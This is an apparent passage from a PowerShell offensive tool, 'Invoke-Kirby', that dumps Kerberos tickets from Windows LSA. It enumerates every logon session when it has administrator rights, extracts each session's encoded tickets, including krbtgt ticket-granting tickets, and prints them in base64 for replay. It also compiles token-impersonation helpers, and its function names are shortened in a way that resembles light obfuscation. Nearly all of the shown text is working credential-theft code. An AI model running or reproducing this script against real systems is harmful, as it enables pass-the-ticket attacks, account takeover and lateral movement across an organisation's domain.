11 | Function GetLogonSessionData($luid){$luidptr=nO System.IntPtr;$sessionDataPtr=nO System.IntPtr;try{$luidptr=[System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf($luid));[System.Runtime.InteropServices.Marshal]::StructureToPtr($luid,$luidptr,$false);$ret=[ticket.dump]::LsaGetLogonSessionData($luidptr,[ref]$sessionDataPtr);if($ret-eq 0){$type=nO ticket.dump+SECURITY_LOGON_SESSION_DATA;$type=$type.GetType();[ticket.dump+SECURITY_LOGON_SESSION_DATA]$unsafeData=[System.Runtime.InteropServices.Marshal]::PtrToStructure($sessionDataPtr,[type]$type);$LSD=nO ticket.dump+LogonSessionData;$LSD.AuthenticationPackage=[System.Runtime.InteropServices.Marshal]::PtrToStringUni($unsafeData.AuthenticationPackage.Buffer,$unsafeData.AuthenticationPackage.Length/2);$LSD.DnsDomainName=[System.Runtime.InteropServices.Marshal]::PtrToStringUni($unsafeData.DnsDomainName.Buffer,$unsafeData.DnsDomainName.Length/2);$LSD.LogonID=$unsafeData.LogonID;$LSD.LogonTime=[System.DateTime]::FromFileTime($unsafeData.LogonTime);$LSD.LogonServer=[System.Runtime.InteropServices.Marshal]::PtrToStringUni($unsafeData.LogonServer.Buffer,$unsafeData.LogonServer.Length/2);[ticket.dump+LogonType]$LSD.LogonType=$unsafeData.LogonType;$LSD.Sid=nO System.Security.Principal.SecurityIdentifier($unsafeData.PSid);$LSD.Upn=[System.Runtime.InteropServices.Marshal]::PtrToStringUni($unsafeData.Upn.Buffer,$unsafeData.Upn.Length/2);$LSD.Session=[int]$unsafeData.Session;$LSD.username=[System.Runtime.InteropServices.Marshal]::PtrToStringUni($unsafeData.username.Buffer,$unsafeData.username.Length/2);$LSD.LogonDomain=[System.Runtime.InteropServices.Marshal]::PtrToStringUni($unsafeData.LogonDomain.buffer,$unsafeData.LogonDomain.Length/2)}}finally{if($sessionDataPtr-ne[System.IntPtr]::Zero){[ticket.dump]::LsaFreeReturnBuffer($sessionDataPtr)>$null}if($luidptr-ne[System.IntPtr]::Zero){[ticket.dump]::LsaFreeReturnBuffer($luidptr)>$null}}return $LSD}
12 | Function GCL(){$o=klist;return $o.split("`n")[1].split(":")[1]}
13 | Function RAA(){$user=[System.Security.Principal.WindowsIdentity]::GetCurrent();$princ=nO System.Security.Principal.WindowsPrincipal($user);return $princ.IsInRole("Administrators") -or $user.Name -match $sn}
14 | Function ET([intptr]$l,[int]$a,[ticket.dump+LUID]$u=(nO ticket.dump+LUID),[string]$t,[System.UInt32]$f=0,$tk){$r=[System.IntPtr]::Zero;$q=nO ticket.dump+KERB_RETRIEVE_TKT_REQUEST;$qType=$q.GetType();$s=nO ticket.dump+KERB_RETRIEVE_TKT_RESPONSE;$sType=$s.GetType();$e=0;$v=0;$q.MessageType=[ticket.dump+KERB_PROTOCOL_MESSAGE_TYPE]::KerbRetrieveEncodedTicketMessage;$q.LogonId=$u;$q.TicketFlags=0x0;$q.CacheOptions=0x8;$q.EncryptionType=0x0;$n=nO ticket.dump+UNICODE_STRING;$n.Length=[System.UInt16]($t.Length*2);$n.MaximumLength=[System.UInt16](($n.Length)+2);$n.buffer=[System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($t);$q.TargetName=$n;$z=[System.Runtime.InteropServices.Marshal]::SizeOf([type]$qType);$x=$z+$n.MaximumLength;$y=[System.Runtime.InteropServices.Marshal]::AllocHGlobal($x);[System.Runtime.InteropServices.Marshal]::StructureToPtr($q,$y,$false);$w=[System.IntPtr]([System.Int64]($y.ToInt64()+[System.Int64]$z));[ticket.dump]::CopyMemory($w,$n.buffer,$n.MaximumLength);if([System.IntPtr]::Size -eq 8){$size=24}else{$size=16}[System.Runtime.InteropServices.Marshal]::WriteIntPtr($y,$size,$w);$rc=[ticket.dump]::LsaCallAuthenticationPackage($l,$a,$y,$x,[ref]$r,[ref]$e,[ref]$v);if(($rc-eq 0)-and($e -ne 0)){$s=[System.Runtime.InteropServices.Marshal]::PtrToStructure($r,[type]$sType);$encodedTicketSize=$s.Ticket.EncodedTicketSize;$encodedTicket=[System.Array]::CreateInstance([byte],$encodedTicketSize);[System.Runtime.InteropServices.Marshal]::Copy($s.Ticket.EncodedTicket,$encodedTicket,0,$encodedTicketSize)}[ticket.dump]::LsaFreeReturnBuffer($r);[System.Runtime.InteropServices.Marshal]::FreeHGlobal($y);$tobj=nO psobject;$tobj|aM -Type NoteProperty -Name "success" -Value $true;try{$tobj|aM -Type NoteProperty -Name "Ticket" -Value $([Convert]::ToBase64String($encodedTicket));$tobj|aM -Type NoteProperty -Name "SessionKeyType" -Value $s.Ticket.SessionKey.KeyType}catch{$tobj.success=$false}return $tobj}
15 | Function EnumerateLogonSessions(){$luids=@();if(!(RAA)){$strLuid=GCL;$intLuid=[convert]::ToInt32($strluid,16);$luid=nO ticket.dump+LUID;$luid.LowPart=$intLuid;$luids+=$luid;}else{$count=nO System.Int32;$luidptr=nO System.IntPtr;$ret=[ticket.dump]::LsaEnumerateLogonSessions([ref]$count,[ref]$luidptr);if($ret -ne 0){$ret}else{$Luidtype=nO ticket.dump+LUID;$Luidtype=$Luidtype.GetType();for($i=0;$i -lt[int32]$count;$i++){$luid=[System.Runtime.InteropServices.Marshal]::PtrToStructure($luidptr,[type]$Luidtype);$luids+=$luid;[System.IntPtr]$luidptr=$luidptr.ToInt64()+[System.Runtime.InteropServices.Marshal]::SizeOf([type]$Luidtype);}[ticket.dump]::LsaFreeReturnBuffer($luidptr)}}return $luids}
16 | Function DSC($scs){foreach($sc in $scs){if($sc.Ticketb64 -ne $null-and(@($sc).Count -gt 0)-and($sc[0].LogonSession[0].LogonID.LowPart -ne "0")){foreach($tk in $sc){$si=if($tk.ServerName -like "*krbtgt*"){"Service Name     : {0}"-f $tk.ServerName}else{"Service Name     : {0}"-f $tk.ServerName}wO $si;wO ("EncryptionType   : {0}"-f ([ticket.dump+EncTypes]$tk.EncryptionType));wO ("Ticket Exp       : {0}"-f $tk.EndTime);wO ("Server Name      : {0}@{1}"-f ($tk.ServerName -split "/")[1],$tk.ServerRealm);wO ("UserName         : {0}@{1}" -f $tk.ClientName, $tk.ClientRealm);wO ("Flags            : {0}"-f $tk.TicketFlags);if($tk.SessionKeyType){wO ("Session Key Type : {0}`n"-f $tk.SessionKeyType)}wO "-[Ticket]-`n";wO $tk.Ticketb64;wO ""}}}}
17 | function main{$tickdotnet = @"
18 | [StructLayout(LayoutKind.Sequential)]$x struct LUID{$x UInt32 LowPart;$x Int32 HighPart;}[DllImport("secur32.dll",SetLastError=false)]$x static extern int LsaConnectUntrusted([Out]out IntPtr LsaHandle);[StructLayout(LayoutKind.Sequential)]$x struct LSA_STRING_IN{$x ushort Length;$x ushort MaximumLength;$x IntPtr buffer;}[DllImport("secur32.dll",SetLastError=true)]$x static extern int LsaRegisterLogonProcess(LSA_STRING_IN LogonProcessName,out IntPtr LsaHandle,out ulong SecurityMode);[DllImport("secur32.dll",SetLastError=false)]$x static extern int LsaLookupAuthenticationPackage([In]IntPtr LsaHandle,[In]ref LSA_STRING_IN PackageName,[Out]out UInt32 AuthenticationPackage);[DllImport("Secur32.dll",SetLastError=false)]$x static extern int LsaEnumerateLogonSessions(out uint LogonSessionCount,out IntPtr LogonSessionList);[DllImport("secur32.dll",SetLastError=false)]$x static extern int LsaFreeReturnBuffer([In]IntPtr buffer);$x enum LogonType{UndefinedLogonType,Interactive,Network,Batch,Service,Proxy,Unlock,NetworkCleartext,NewCredentials,RemoteInteractive,CachedInteractive,CachedRemoteInteractive,CachedUnlock}$x class LogonSessionData{$x LUID LogonID;$x string username;$x string LogonDomain;$x string AuthenticationPackage;$x LogonType logonType;$x int Session;$x SecurityIdentifier Sid;$x DateTime LogonTime;$x string LogonServer;$x string DnsDomainName;$x string Upn;}$x struct SECURITY_LOGON_SESSION_DATA{$x UInt32 size;$x LUID LogonID;$x LSA_STRING_IN username;$x LSA_STRING_IN LogonDomain;$x LSA_STRING_IN AuthenticationPackage;$x UInt32 logontype;$x UInt32 Session;$x IntPtr PSid;$x UInt64 LogonTime;$x LSA_STRING_IN LogonServer;$x LSA_STRING_IN DnsDomainName;$x LSA_STRING_IN Upn;}[DllImport("Secur32.dll",SetLastError=false)]$x static extern uint LsaGetLogonSessionData(IntPtr luid,out IntPtr ppLogonSessionData);$x enum KERB_PROTOCOL_MESSAGE_TYPE{KerbDebugRequestMessage,KerbQueryTicketCacheMessage,KerbChangeMachinePasswordMessage,KerbVerifyPacMessage,KerbRetrieveTicketMessage,KerbUpdateAddressesMessage,KerbPurgeTicketCacheMessage,KerbChangePasswordMessage,KerbRetrieveEncodedTicketMessage,KerbDecryptDataMessage,KerbAddBindingCacheEntryMessage,KerbSetPasswordMessage,KerbSetPasswordExMessage,KerbVerifyCredentialMessage,KerbQueryTicketCacheExMessage,KerbPurgeTicketCacheExMessage,KerbRefreshSmartcardCredentialsMessage,KerbAddExtraCredentialsMessage,KerbQuerySupplementalCredentialsMessage,KerbTransferCredentialsMessage,KerbQueryTicketCacheEx2Message,KerbSubmitTicketMessage,KerbAddExtraCredentialsExMessage}[StructLayout(LayoutKind.Sequential)]$x struct KERB_QUERY_TKT_CACHE_REQUEST{$x KERB_PROTOCOL_MESSAGE_TYPE MessageType;$x LUID LogonId;}[StructLayout(LayoutKind.Sequential)]$x struct UNICODE_STRING{$x ushort Length;$x ushort MaximumLength;$x IntPtr Buffer;}[StructLayout(LayoutKind.Sequential)]$x struct KERB_TICKET_CACHE_INFO_EX{$x UNICODE_STRING ClientName;$x UNICODE_STRING ClientRealm;$x UNICODE_STRING ServerName;$x UNICODE_STRING ServerRealm;$x long StartTime;$x long EndTime;$x long RenewTime;$x uint EncryptionType;$x uint TicketFlags;}[Flags]$x enum TicketFlags:uint{name_canonicalize=0x10000,forwardable=0x40000000,forwarded=0x20000000,hw_authent=0x00100000,initial=0x00400000,invalid=0x01000000,may_postdate=0x04000000,ok_as_delegate=0x00040000,postdated=0x02000000,pre_authent=0x00200000,proxiable=0x10000000,proxy=0x08000000,renewable=0x00800000,reserved=0x80000000,reserved1=0x00000001}$x enum EncTypes:uint{DES_CBC_CRC=0x0001,DES_CBC_MD4=0x0002,DES_CBC_MD5=0x0003,DES_CBC_raw=0x0004,DES3_CBC_raw=0x0006,DES3_CBC_SHA_1=0x0010,AES128_CTS_HMAC_SHA1_96=0x0011,AES256_CTS_HMAC_SHA1_96=0x0012,AES128_cts_hmac_sha256_128=0x0013,AES256_cts_hmac_sha384_192=0x0014,RC4_HMAC_MD5=0x0017,RC4_HMAC_MD5_EXP=0x0018}[StructLayout(LayoutKind.Sequential)]$x struct KERB_QUERY_TKT_CACHE_RESPONSE{$x KERB_PROTOCOL_MESSAGE_TYPE MessageType;$x int CountOfTickets;$x IntPtr Tickets;}[StructLayout(LayoutKind.Sequential)]$x struct SECURITY_HANDLE{$x IntPtr LowPart;$x IntPtr HighPart;}[StructLayout(LayoutKind.Sequential)]$x struct KERB_RETRIEVE_TKT_REQUEST{$x KERB_PROTOCOL_MESSAGE_TYPE MessageType;$x LUID LogonId;$x UNICODE_STRING TargetName;$x uint TicketFlags;$x uint CacheOptions;$x int EncryptionType;$x SECURITY_HANDLE CredentialsHandle;}[StructLayout(LayoutKind.Sequential)]$x struct KERB_CRYPTO_KEY{$x int KeyType;$x int Length;$x IntPtr Value;}[StructLayout(LayoutKind.Sequential)]$x struct KERB_EXTERNAL_TICKET{$x IntPtr ServiceName;$x IntPtr TargetName;$x IntPtr ClientName;$x UNICODE_STRING DomainName;$x UNICODE_STRING TargetDomainName;$x UNICODE_STRING AltTargetDomainName;$x KERB_CRYPTO_KEY SessionKey;$x uint TicketFlags;$x uint Flags;$x long KeyExpirationTime;$x long StartTime;$x long EndTime;$x long RenewUntil;$x long TimeSkew;$x int EncodedTicketSize;$x IntPtr EncodedTicket;}[StructLayout(LayoutKind.Sequential)]$x struct KERB_RETRIEVE_TKT_RESPONSE{$x KERB_EXTERNAL_TICKET Ticket;}[DllImport("Secur32.dll",SetLastError=true)]$x static extern int LsaCallAuthenticationPackage(IntPtr LsaHandle,uint AuthenticationPackage,IntPtr ProtocolSubmitBuffer,int SubmitBufferLength,out IntPtr ProtocolReturnBuffer,out ulong ReturnBufferLength,out int ProtocolStatus);[DllImport("secur32.dll",SetLastError=false)]$x static extern int LsaDeregisterLogonProcess([In]IntPtr LsaHandle);[DllImport("kernel32.dll",EntryPoint="CopyMemory",SetLastError=false)]$x static extern void CopyMemory(IntPtr dest,IntPtr src,uint count);
19 | "@
20 | $tickasm=[System.Reflection.Assembly]::LoadWithPartialName("System.Security.Principal");Add-Type -MemberDefinition $tickdotnet -Namespace "ticket" -Name "dump" -ReferencedAssemblies $tickasm.location -UsingNamespace System.Security.Principal;try{& {$ErrorActionPreference='Stop';[void][impsys.win32]}}catch{
21 | Add-Type -TypeDefinition @"
22 | using System;using System.Runtime.InteropServices;namespace impsys{$x class win32{[DllImport("kernel32.dll", SetLastError=true)]$x static extern bool CloseHandle(IntPtr hHandle);[DllImport("kernel32.dll", SetLastError=true)]$x static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);[DllImport("advapi32.dll", SetLastError=true)]$x static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);[DllImport("advapi32.dll", SetLastError=true)]$x static extern bool DuplicateTokenEx(IntPtr hExistingToken, uint dwDesiredAccess, IntPtr lpTokenAttributes, uint ImpersonationLevel, uint TokenType, out IntPtr phNewToken);[DllImport("advapi32.dll", SetLastError=true)]$x static extern bool ImpersonateLoggedOnUser(IntPtr hToken);[DllImport("advapi32.dll", SetLastError=true)]$x static extern bool RevertToSelf();}}
23 | "@}
24 | $authpckg = nO System.Int32;$rc = nO System.Int32;$krbname = "kerberos";$LS = nO ticket.dump+LSA_STRING_IN;$LS.Length = [uint16]$krbname.Length;$LS.MaximumLength = [uint16]($krbname.Length + 1);$LS.buffer = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($krbname);$lh = Get-lsah;$retcode = [ticket.dump]::LsaLookupAuthenticationPackage($lh,[ref]$LS,[ref]$authpckg);if ($retcode -ne 0){return -1}foreach($luid in EnumerateLogonSessions){if ($([System.Convert]::ToString($luid.LowPart,16) -eq 0x0)){continue;} else{$LSD = nO ticket.dump+LogonSessionData;try {$LSD = GetLogonSessionData($luid)} catch{continue}$sc = @();$tksPointer = nO System.IntPtr;$returnBufferLength = 0;$protocolStatus = 0;$tkCacheRequest = nO ticket.dump+KERB_QUERY_TKT_CACHE_REQUEST;$tkCacheRespone = nO ticket.dump+KERB_QUERY_TKT_CACHE_RESPONSE;$tkCacheResponeType = $tkCacheRespone.GetType();$tcr = nO ticket.dump+KERB_TICKET_CACHE_INFO_EX;$tkCacheRequest.MessageType = [ticket.dump+KERB_PROTOCOL_MESSAGE_TYPE]::KerbQueryTicketCacheExMessage;if(RAA){$tkCacheRequest.LogonId = $LSD.LogonID}else{$tkCacheRequest.LogonId = nO ticket.dump+LUID}$tQueryPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf($tkCacheRequest));[System.Runtime.InteropServices.Marshal]::StructureToPtr($tkCacheRequest,$tQueryPtr,$false);$retcode = [ticket.dump]::LsaCallAuthenticationPackage($lh,$authpckg,$tQueryPtr,[System.Runtime.InteropServices.Marshal]::SizeOf($tkCacheRequest),[ref]$tksPointer,[ref]$returnBufferLength,[ref]$protocolStatus);if(($retcode -eq 0) -and ($tksPointer -ne [System.IntPtr]::Zero)){[ticket.dump+KERB_QUERY_TKT_CACHE_RESPONSE]$tkCacheRespone = [System.Runtime.InteropServices.Marshal]::PtrToStructure($tksPointer,[type]$tkCacheResponeType);$count2 = $tkCacheRespone.CountOfTickets;if($count2 -ne 0){$cacheInfoType = $tcr.GetType();$dataSize = [System.Runtime.InteropServices.Marshal]::SizeOf([type]$cacheInfoType);for($j = 0;$j -lt $count2;$j++){[System.IntPtr]$currTicketPtr = [int64]($tksPointer.ToInt64() + [int](8 + $j * $dataSize));[ticket.dump+KERB_TICKET_CACHE_INFO_EX]$tcr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($currTicketPtr,[type]$cacheInfoType);$tk = nO psobject;Add-Member -InputObject $tk -MemberType NoteProperty -name "StartTime" -value  ([datetime]::FromFileTime($tcr.StartTime));Add-Member -InputObject $tk -MemberType NoteProperty -name "EndTime" -value  ([datetime]::FromFileTime($tcr.EndTime));Add-Member -InputObject $tk -MemberType NoteProperty -name  "RenewTime" -value ([datetime]::FromFileTime($tcr.RenewTime));Add-Member -InputObject $tk -MemberType NoteProperty -Name "TicketFlags" -Value ([ticket.dump+TicketFlags]$tcr.TicketFlags);Add-Member -InputObject $tk -MemberType NoteProperty -Name "EncryptionType" -Value $tcr.EncryptionType;Add-Member -InputObject $tk -MemberType NoteProperty -name  "ServerName" -value  ([System.Runtime.InteropServices.Marshal]::PtrToStringUni($tcr.ServerName.Buffer,$tcr.ServerName.Length / 2));Add-Member -InputObject $tk -MemberType NoteProperty -name  "ServerRealm" -value ([System.Runtime.InteropServices.Marshal]::PtrToStringUni($tcr.ServerRealm.Buffer,$tcr.ServerRealm.Length / 2));Add-Member -InputObject $tk -MemberType NoteProperty -name  "ClientName" -value ([System.Runtime.InteropServices.Marshal]::PtrToStringUni($tcr.ClientName.Buffer,$tcr.ClientName.Length / 2));Add-Member -InputObject $tk -MemberType NoteProperty -name "ClientRealm" -value ([System.Runtime.InteropServices.Marshal]::PtrToStringUni($tcr.ClientRealm.Buffer,$tcr.ClientRealm.Length / 2));Add-Member -InputObject $tk -MemberType NoteProperty -Name "LogonSession" -Value $LSD;$InfoObj = (ET $lh $authpckg $tkCacheRequest.LogonId $tk.ServerName $tcr.TicketFlags $tk);if ($InfoObj.success -eq $true){$SessionEncType = $InfoObj.SessionKeyType;$tkb64 = $InfoObj.Ticket;Add-Member -InputObject $tk -MemberType NoteProperty -Name "Ticketb64" -Value $tkb64;try{if($SessionEncType -ne 0 ){Add-Member -InputObject $tk -MemberType NoteProperty -Name "SessionKeyType" -Value ([ticket.dump+EncTypes]$SessionEncType)};}catch{}} else{}$sc += $tk;}}}[ticket.dump]::LsaFreeReturnBuffer($tksPointer)|Out-Null;[System.Runtime.InteropServices.Marshal]::FreeHGlobal($tQueryPtr);$scs += @(,$sc)}}[ticket.dump]::LsaDeregisterLogonProcess($lh)|Out-Null;DSC $scs}$dtk = $false;main}
25 | Invoke-Kirby
26 | 


--------------------------------------------------------------------------------